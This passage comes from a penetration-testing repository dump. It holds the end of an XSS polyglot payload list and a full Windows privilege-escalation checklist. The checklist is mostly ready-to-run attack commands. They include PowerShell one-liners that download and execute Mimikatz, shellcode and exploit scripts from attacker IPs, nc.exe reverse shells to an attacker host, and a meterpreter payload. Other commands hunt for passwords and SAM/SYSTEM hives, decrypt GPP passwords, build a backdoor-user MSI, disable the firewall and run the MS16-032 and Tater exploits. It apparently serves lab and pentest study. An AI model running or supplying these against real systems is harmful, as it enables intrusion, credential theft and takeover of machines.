*/ alert(1)// 317 | ``` 318 | 319 | Polyglot XSS - Rsnake 320 | 321 | ```javascript 322 | ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> 323 | ``` 324 | 325 | Polyglot XSS - Daniel Miessler 326 | 327 | ```javascript 328 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 329 | “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// 330 | '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 331 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 332 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 333 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 334 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 335 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 336 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 337 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 338 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 339 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 340 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 341 | 
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 342 | ``` 343 | 344 | Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) 345 | ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) 346 | 347 | ```javascript 348 | -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> 349 | ``` 350 | 351 | ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) 352 | 353 | ```javascript 354 | <svg%0Ao%00nload=%09((pro\u006dpt))()// 355 | ``` 356 | 357 | Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml) 358 | 359 | ```javascript 360 | # by crlf 361 | javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> 362 | 363 | # by europa 364 | javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> 365 | 366 | # by EdOverflow 367 | javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> 368 | 369 | # by h1/ragnar 370 | javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` 371 | ``` 372 | 373 | Reading: 374 | 375 | https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot 376 | 377 | https://www.exploit-db.com/papers/13646/ (This is an awesome paper) 378 | 379 | http://brutelogic.com.br/blog/probing-to-find-xss/ 380 | 381 | -------------------------------------------------------------------------------- /windows-privesc.md: -------------------------------------------------------------------------------- 1 | So this is my quick and dirty checklist for windows privilege escalation. It's mostly copied from the links at the bottom of the page. 
2 | 3 | ### Initial Information Gathering 4 | 5 | This step is to understand a few things about the machine. Start with users/privileges, installed software, and what hotfixes are installed. 6 | 7 | What system are we connected to? 8 | ```cmd 9 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 10 | ``` 11 | Get the hostname and username 12 | ```cmd 13 | whoami 14 | whoami /priv 15 | hostname 16 | echo %username% 17 | ``` 18 | Learn about your environment 19 | ```cmd 20 | SET 21 | echo %PATH% 22 | ``` 23 | List other users on the box and domain 24 | ```cmd 25 | qwinsta 26 | net users 27 | net accounts 28 | net user <username> 29 | dir /b /ad "C:\Users\" 30 | net localgroups 31 | Get-LocalGroup | ft Name 32 | net localgroup Administrators 33 | Get-LocalGroupMember Administrators | ft Name, PrincipalSource 34 | net group /domain 35 | net group /domain <Group Name> 36 | Get-LocalUser | ft Name,Enabled,LastLogon 37 | Get-ChildItem C:\Users -Force | select Name 38 | ``` 39 | Check installed software 40 | ```cmd 41 | dir /a "C:\Program Files" 42 | dir /a "C:\Program Files (x86)" 43 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 44 | ``` 45 | List all drives 46 | ```cmd 47 | wmic logicaldisk get caption || fsutil fsinfo drives 48 | wmic logicaldisk get caption,description,providername 49 | Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root 50 | ``` 51 | How well patched is the machine? 52 | ```cmd 53 | wmic qfe get Caption,Description,HotFixID,InstalledOn 54 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.." - to find specific KBs 55 | ``` 56 | 57 | Do we want to run Invoke-Shellcode.ps1? 
58 | ```powershell 59 | Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost YourIPAddress -Lport 4444 -Force" 60 | ``` 61 | 62 | ### Kernel Exploits 63 | 64 | Here we want to run the Sherlock/Watson and PowerUp scripts to check for low hanging fruit and easy wins. The functions we want are Find-AllVulns and Invoke-AllChecks. You can just use the -encodedcommand flag and not deal with these quotes as well. 65 | 66 | https://github.com/rasta-mouse/Sherlock 67 | 68 | https://github.com/rasta-mouse/Watson 69 | 70 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 71 | 72 | The normal way to run a powershell script using net webclient objects with no modifications. 73 | ```powershell 74 | powershell `IEX((new-object net.webclient).downloadstring('http://10.10.14.22:8000/Sherlock.ps1')); Find-AllVulns` 75 | powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks" 76 | powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" 77 | ``` 78 | 79 | If we have a webshell or something non interactive try piping it to powershell and pulling from stdin like so. Thanks to Ippsec for showing this method. 80 | https://www.youtube.com/watch?v=lP-E5vmZNC0 81 | ```powershell 82 | echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1'); | powershell -noprofile - 83 | ``` 84 | Sometimes its easier to encode your PS commands into UTF/base64 like so... 85 | ```powershell 86 | powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" | iconv --to-code UTF-16LE | base64 -w 0 87 | ``` 88 | Then just run it on your windows shell... 
89 | ```powershell 90 | powershell -encodedcommand ADFSDGSDGSDGDSG== 91 | ``` 92 | 93 | Otherwise just upload it somewhere and execute these 94 | ```powershell 95 | powershell -nop -ep bypass 96 | Import-Module C:\Users\740i\Desktop\Sherlock.ps1 97 | Find-AllVulns 98 | ``` 99 | Compiling all these Windows exploits on Linux can really be a pain in the ass 100 | ```bash 101 | i686-w64-mingw32-gcc exploit.c -o exploit 102 | ``` 103 | or for 32 bit 104 | ```bash 105 | i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 106 | ``` 107 | Precompiled windows exploits they seem safe... 108 | 109 | https://github.com/abatchy17/WindowsExploits 110 | 111 | https://github.com/SecWiki/windows-kernel-exploits 112 | 113 | 114 | 115 | 116 | 117 | 118 | ### Passwords and Interesting Files 119 | 120 | There might be cleartext, base64, or hashed passwords somewhere on the machine to find. Some of this will output a lot of garbage so maybe echo it into a file and look it over later. 121 | 122 | 123 | First look for regular file types containing the string password 124 | ```cmd 125 | findstr /si password *.xml *.ini *.txt *.config 2>nul 126 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 127 | findstr /spin "password" *.* 128 | ``` 129 | 130 | Check .config or other interesting file types for those strings 131 | ```cmd 132 | dir /s *pass* == *cred* == *vnc* == *.config* 133 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 134 | where /R C:\ user.txt 135 | where /R C:\ *.ini 136 | ``` 137 | 138 | Sometimes these get left behind and might have passwords inside them 139 | ```cmd 140 | c:\sysprep.inf 141 | c:\sysprep\sysprep.xml 142 | c:\unattend.xml 143 | %WINDIR%\Panther\Unattend\Unattended.xml 144 | %WINDIR%\Panther\Unattended.xml 145 | 146 | dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul 147 | ``` 148 | 149 | Is VNC installed? 
150 | ```cmd 151 | dir c:\*vnc.ini /s /b 152 | dir c:\*ultravnc.ini /s /b 153 | dir c:\ /s /b | findstr /si *vnc.ini 154 | ``` 155 | 156 | Check the registry for SNMP, VNC, Putty, autologin and other passwords. 157 | ```cmd 158 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 159 | reg query "HKCU\Software\ORL\WinVNC3\Password" 160 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 161 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 162 | reg query HKLM /f password /t REG_SZ /s 163 | reg query HKCU /f password /t REG_SZ /s 164 | ``` 165 | 166 | Check for SAM and SYSTEM files access 167 | ```cmd 168 | %SYSTEMROOT%\repair\SAM 169 | %SYSTEMROOT%\System32\config\RegBack\SAM 170 | %SYSTEMROOT%\System32\config\SAM 171 | %SYSTEMROOT%\repair\system 172 | %SYSTEMROOT%\System32\config\SYSTEM 173 | %SYSTEMROOT%\System32\config\RegBack\system 174 | ``` 175 | Whats in inetpub if its there? web.config files might have passwords 176 | ```cmd 177 | dir /a C:\inetpub\ 178 | dir /s web.config 179 | C:\Windows\System32\inetsrv\config\applicationHost.config 180 | Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue 181 | ``` 182 | IIS and Apache logs? 
183 | ```cmd 184 | dir /s access.log error.log 185 | C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log 186 | C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log 187 | C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log 188 | C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log 189 | ``` 190 | If XAMPP/WAMPP, Apache, or PHP is installed check the config files 191 | ``` 192 | dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf 193 | ``` 194 | 195 | Check for stored creds with cmdkey 196 | ```cmd 197 | cmdkey /list 198 | ``` 199 | Then you can run something like this over SMB with any saved credientials 200 | ```cmd 201 | runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" 202 | ``` 203 | Or you can use runas and feed it credentials 204 | ```cmd 205 | C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe" 206 | ``` 207 | ```powershell 208 | $ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force 209 | $ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd) 210 | $ computer = "<hostname>" 211 | [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) 212 | ``` 213 | 214 | 215 | ### Networking 216 | 217 | Check the simple stuff... 218 | ```cmd 219 | ipconfig /all 220 | route print 221 | arp -a 222 | net share 223 | Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 224 | Get-DnsClientServerAddress -AddressFamily IPv4 | ft 225 | Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 226 | Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 227 | ``` 228 | 229 | Some services might be open on the outside or the inside only of the network. Look for local address 127.0.0.1 or something internal. 
230 | ```cmd 231 | netstat /a 232 | netstat -ano 233 | ``` 234 | So to expose SMB on a victim for example, upload plink.exe from /usr/share/windows-binaries, start SSH on attacker machine then on victim run 235 | ```cmd 236 | plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS 237 | ``` 238 | 239 | Firewall turned on? 240 | ```cmd 241 | netsh advfirewall firewall dump 242 | netsh firewall show state 243 | netsh firewall show config 244 | netsh firewall set opmode disable 245 | ``` 246 | List firewall's blocked ports 247 | 248 | ```powershell 249 | $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 250 | ``` 251 | 252 | Enable RDP if you want 253 | ```cmd 254 | reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 255 | netsh firewall set service remoteadmin enable 256 | netsh firewall set service remotedesktop enable 257 | ``` 258 | ### Group Policy Preferences 259 | If the box is part of a domain and the user account you have can read System Volume Information, then check for files with passwords. Start by checking the environment variables for the IP-address of the domain controller if that's unclear. Output environment-variables by typing```set```and look for the following: 260 | ```cmd 261 | LOGONSERVER=\\NAMEOFSERVER 262 | USERDNSDOMAIN=WHATEVER.LOCAL 263 | ``` 264 | Then look up the IP-address 265 | ```cmd 266 | nslookup nameofserver.whatever.local 267 | ``` 268 | 269 | Now we mount it and search for the groups.xml file 270 | ```cmd 271 | net use z: \\192.168.1.101\SYSVOL 272 | z: 273 | dir Groups.xml /s 274 | ``` 275 | Then just decrypt any found passwords in kali with the gpp-decrypt tool. 276 | 277 | You can also do this with powerview and the get gpp-password scripts from powershell empire. 
278 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 279 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 280 | 281 | Here in powershell we load them into memory 282 | 283 | ```powershell 284 | IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.100/Get-GPPPassword.ps1") 285 | IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.100/powerview.ps1") 286 | ``` 287 | Then run ```Get-GPPPassword```and feed any listed GUID's setting administrator passwords to powerview.ps1 like so. This will check any found credentials against other domain machines. 288 | ```cmd 289 | Get-NetOU -GUID "{4C86DD57-4040-41CD-B163-58F208A26623}" | %{ Get-NetComputer -ADSPath $_ } 290 | ``` 291 | 292 | Check https://www.toshellandback.com/2015/08/30/gpp/ for some explanations. 293 | 294 | 295 | ### Scheduled Tasks 296 | 297 | Look for anything custom, run by a privileged user, and running a binary we can overwrite. Might be tons of output 298 | ```cmd 299 | schtasks /query /fo LIST 2>nul | findstr TaskName 300 | dir C:\windows\tasks 301 | ``` 302 | Or in powershell 303 | ```powershell 304 | Get-ScheduledTask | ft TaskName, State 305 | Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State 306 | ``` 307 | Check this file 308 | ```cmd 309 | c:\WINDOWS\SchedLgU.Txt 310 | ``` 311 | 312 | Startup tasks 313 | 314 | ```cmd 315 | wmic startup get caption,command 316 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 317 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 318 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 319 | dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 320 | dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 321 | ``` 322 | 323 | ### AlwaysInstallElevated 324 | 325 | Worth checking for... 
326 | ```cmd 327 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 328 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 329 | ``` 330 | If those keys are set to enabled, then you can use msfvenom to generate a malicious MSI file and install it: 331 | ```bash 332 | $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi 333 | $ msiexec /quiet /qn /i C:\evil.msi 334 | ``` 335 | https://toshellandback.com/2015/11/24/ms-priv-esc/ has some more examples. 336 | 337 | 338 | ### Weak Service, Process, and Program Permissions 339 | Taken mostly from https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 340 | 341 | What is installed? 342 | ```cmd 343 | dir /a "C:\Program Files" 344 | dir /a "C:\Program Files (x86)" 345 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 346 | ``` 347 | 348 | List processes running as SYSTEM 349 | ```cmd 350 | tasklist /FI "username eq SYSTEM" 351 | ``` 352 | 353 | Then check for weak folder or file permissions in a couple different ways as needed. 354 | 355 | Full Permissions in Program Files? 356 | ```cmd 357 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 358 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" 359 | 360 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 361 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 362 | ``` 363 | 364 | Modify Permissions in Program Files? 
365 | 366 | ```cmd 367 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 368 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" 369 | 370 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 371 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 372 | ``` 373 | 374 | You can also use accesschk to check for weak folder and file permissions. https://github.com/ankh2054/windows-pentest/tree/master/Privelege has both versions 375 | ```cmd 376 | accesschk.exe /accepteula ... ... ... 377 | accesschk.exe -uwqs "Everyone" * 378 | accesschk.exe -uwqs "Authenticated Users" * 379 | accesschk.exe -uwqs "Users" * 380 | accesschk.exe -uwqs Users c:\*.* 381 | ``` 382 | Or just look for weak folders per drive 383 | ```cmd 384 | accesschk.exe -uwdqs Users c:\ 385 | accesschk.exe -uwdqs "Authenticated Users" c:\ 386 | ``` 387 | 388 | Weak service permissions that can be reconfigured? 389 | 390 | ```cmd 391 | accesschk.exe -uwcqv "Everyone" * 392 | accesschk.exe -uwcqv "Authenticated Users" * 393 | accesschk.exe -uwcqv "Users" * 394 | ``` 395 | 396 | Don't forget to look for any unquoted service paths 397 | 398 | ```cmd 399 | wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ 400 | ``` 401 | Or do 402 | ```cmd 403 | echo %path% 404 | accesschk.exe -dqv "C:\Python27" 405 | ``` 406 | on any non default directories, often times you will find python here for example. 407 | 408 | 409 | 410 | ### MS16-032 Secondary Logon Handle 411 | 412 | This script by Fuzzysecurity is amazing https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1, but might need a few changes as you can either modify it to run your own specified binary or run as is to spawn a cmd shell, which sometimes doesn't work unless you already have an RDP session on the victim. 
The target also needs to have 2+ CPU cores so this will fail often on vm boxes. 413 | 414 | To check if the machine is patched 415 | ```cmd 416 | wmic qfe list | find "3139914" 417 | ``` 418 | 419 | First off to just run it as usual upload the script to the victim and do this 420 | ```powershell 421 | powershell -nop -ep bypass 422 | Import-Module C:\Users\Victim\Desktop\MS16-032.ps1 423 | Invoke-MS16-032 424 | ``` 425 | Or you can try running it remotely from a normal windows shell this may not work unless its over RDP. 426 | ```powershell 427 | powershell -c `iex ((new-object net.webclient).downloadstring('http://10.10.14.22:8000/Invoke-MS16-032.ps1')); Invoke-MS16-032` 428 | ``` 429 | 430 | To have it call something other than the cmd.exe payload, modify this path located in the middle of Fuzzysec's script. This seems to be reliable with any msf payload. 431 | ```powershell 432 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 433 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 434 | "user", "domain", "pass", 435 | 0x00000002, "C:\Users\740i\Desktop\danger.exe", "", 436 | 0x00000004, $null, $GetCurrentPath, 437 | [ref]$StartupInfo, [ref]$ProcessInfo) 438 | ``` 439 | There is also a custom binary from Meatballs that will just spawn a command prompt as system. https://github.com/Meatballs1/ms16-032 440 | 441 | The Powershell empire version will take a -Command flag that makes it easy to run it against another reverse shell or a local command to escalate privileges. 
442 | https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1 443 | 444 | ```powershell 445 | powershell.exe -nop -ep bypass 446 | Import-Module C:\Users\740i\Desktop\Invoke-MS16032.ps1 447 | Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/shell.ps1')" 448 | ``` 449 | 450 | 451 | ### Tater 452 | 453 | There's a few different implementations of this Hot Potato exploit, I've gotten lucky with the powershell version. 454 | https://github.com/Kevin-Robertson/Tater 455 | 456 | So all you do is download Tater.ps1 somewhere on the target then add administrator user or whatever. 457 | ```powershell 458 | powershell.exe -nop -ep bypass 459 | Import-Module C:\Users\740i\Desktop\Tater.ps1 460 | Invoke-Tater -Trigger 1 -Command "net localgroup administrators 740i /add" 461 | net localgroup administrators 462 | ``` 463 | 464 | 465 | 466 | ### System Files 467 | 468 | If you find an LFI on windows you should check for these two files, the `system` registry and the `SAM` registry. These two files/registries are all we need to get the machines hashes. 469 | ```cmd 470 | Systemroot can be windows 471 | %SYSTEMROOT%\repair\SAM 472 | windows\repair\SAM 473 | %SYSTEMROOT%\System32\config\RegBack\SAM 474 | 475 | System file can be found here 476 | SYSTEMROOT%\repair\system 477 | %SYSTEMROOT%\System32\config\RegBack\system 478 | ``` 479 | Then you can just run pwdump on these files. 
480 | ```cmd 481 | pwdump system sam 482 | ``` 483 | 484 | List of file inclusions for Windows 485 | ```cmd 486 | C:\Apache\conf\httpd.conf 487 | C:\Apache\logs\access.log 488 | C:\Apache\logs\error.log 489 | C:\Apache2\conf\httpd.conf 490 | C:\Apache2\logs\access.log 491 | C:\Apache2\logs\error.log 492 | C:\Apache22\conf\httpd.conf 493 | C:\Apache22\logs\access.log 494 | C:\Apache22\logs\error.log 495 | C:\Apache24\conf\httpd.conf 496 | C:\Apache24\logs\access.log 497 | C:\Apache24\logs\error.log 498 | C:\Documents and Settings\Administrator\NTUser.dat 499 | C:\php\php.ini 500 | C:\php4\php.ini 501 | C:\php5\php.ini 502 | C:\php7\php.ini 503 | C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf 504 | C:\Program Files (x86)\Apache Group\Apache\logs\access.log 505 | C:\Program Files (x86)\Apache Group\Apache\logs\error.log 506 | C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf 507 | C:\Program Files (x86)\Apache Group\Apache2\logs\access.log 508 | C:\Program Files (x86)\Apache Group\Apache2\logs\error.log 509 | c:\Program Files (x86)\php\php.ini" 510 | C:\Program Files\Apache Group\Apache\conf\httpd.conf 511 | C:\Program Files\Apache Group\Apache\conf\logs\access.log 512 | C:\Program Files\Apache Group\Apache\conf\logs\error.log 513 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf 514 | C:\Program Files\Apache Group\Apache2\conf\logs\access.log 515 | C:\Program Files\Apache Group\Apache2\conf\logs\error.log 516 | C:\Program Files\FileZilla Server\FileZilla Server.xml 517 | C:\Program Files\MySQL\my.cnf 518 | C:\Program Files\MySQL\my.ini 519 | C:\Program Files\MySQL\MySQL Server 5.0\my.cnf 520 | C:\Program Files\MySQL\MySQL Server 5.0\my.ini 521 | C:\Program Files\MySQL\MySQL Server 5.1\my.cnf 522 | C:\Program Files\MySQL\MySQL Server 5.1\my.ini 523 | C:\Program Files\MySQL\MySQL Server 5.5\my.cnf 524 | C:\Program Files\MySQL\MySQL Server 5.5\my.ini 525 | C:\Program Files\MySQL\MySQL Server 5.6\my.cnf 526 | C:\Program Files\MySQL\MySQL 
Server 5.6\my.ini 527 | C:\Program Files\MySQL\MySQL Server 5.7\my.cnf 528 | C:\Program Files\MySQL\MySQL Server 5.7\my.ini 529 | C:\Program Files\php\php.ini 530 | C:\Users\Administrator\NTUser.dat 531 | C:\Windows\debug\NetSetup.LOG 532 | C:\Windows\Panther\Unattend\Unattended.xml 533 | C:\Windows\Panther\Unattended.xml 534 | C:\Windows\php.ini 535 | C:\Windows\repair\SAM 536 | C:\Windows\repair\system 537 | C:\Windows\System32\config\AppEvent.evt 538 | C:\Windows\System32\config\RegBack\SAM 539 | C:\Windows\System32\config\RegBack\system 540 | C:\Windows\System32\config\SAM 541 | C:\Windows\System32\config\SecEvent.evt 542 | C:\Windows\System32\config\SysEvent.evt 543 | C:\Windows\System32\config\SYSTEM 544 | C:\Windows\System32\drivers\etc\hosts 545 | C:\Windows\System32\winevt\Logs\Application.evtx 546 | C:\Windows\System32\winevt\Logs\Security.evtx 547 | C:\Windows\System32\winevt\Logs\System.evtx 548 | C:\Windows\win.ini 549 | C:\xampp\apache\conf\extra\httpd-xampp.conf 550 | C:\xampp\apache\conf\httpd.conf 551 | C:\xampp\apache\logs\access.log 552 | C:\xampp\apache\logs\error.log 553 | C:\xampp\FileZillaFTP\FileZilla Server.xml 554 | C:\xampp\MercuryMail\MERCURY.INI 555 | C:\xampp\mysql\bin\my.ini 556 | C:\xampp\php\php.ini 557 | C:\xampp\security\webdav.htpasswd 558 | C:\xampp\sendmail\sendmail.ini 559 | C:\xampp\tomcat\conf\server.xml 560 | ``` 561 | 562 | ### Metasploit Post Modules 563 | 564 | Some useful post-modules to run against msf sessions and do some of this stuff automatically... 
565 | ```bash 566 | use exploit/windows/local/service_permissions 567 | post/windows/gather/credentials/gpp 568 | run post/windows/gather/credential_collector 569 | run post/multi/recon/local_exploit_suggester 570 | run post/windows/gather/enum_shares 571 | run post/windows/gather/enum_snmp 572 | run post/windows/gather/enum_applications 573 | run post/windows/gather/enum_logged_on_users 574 | run post/windows/gather/checkvm 575 | ``` 576 | 577 | ### Handy Scripts 578 | 579 | https://github.com/enjoiz/Privesc 580 | 581 | https://github.com/rasta-mouse/Sherlock 582 | 583 | https://github.com/FuzzySecurity/PowerShell-Suite 584 | 585 | https://github.com/411Hall/JAWS 586 | 587 | 588 | ### Links 589 | 590 | Thanks to these guys for all the work 591 | 592 | http://www.fuzzysecurity.com/tutorials/16.html 593 | 594 | https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 595 | 596 | https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md 597 | 598 | https://github.com/swisskyrepo/PayloadsAllTheThings 599 | 600 | http://www.greyhathacker.net/?p=738 601 | 602 | https://toshellandback.com/2015/11/24/ms-priv-esc/ 603 | 604 | https://www.toshellandback.com/2015/08/30/gpp/ 605 | 606 | https://www.youtube.com/watch?v=kMG8IsCohHA 607 | 608 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ 609 | 610 | https://github.com/sagishahar/lpeworkshop 611 | 612 | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA 613 | 614 | https://bitvijays.github.io/ 615 | 616 | 617 | --------------------------------------------------------------------------------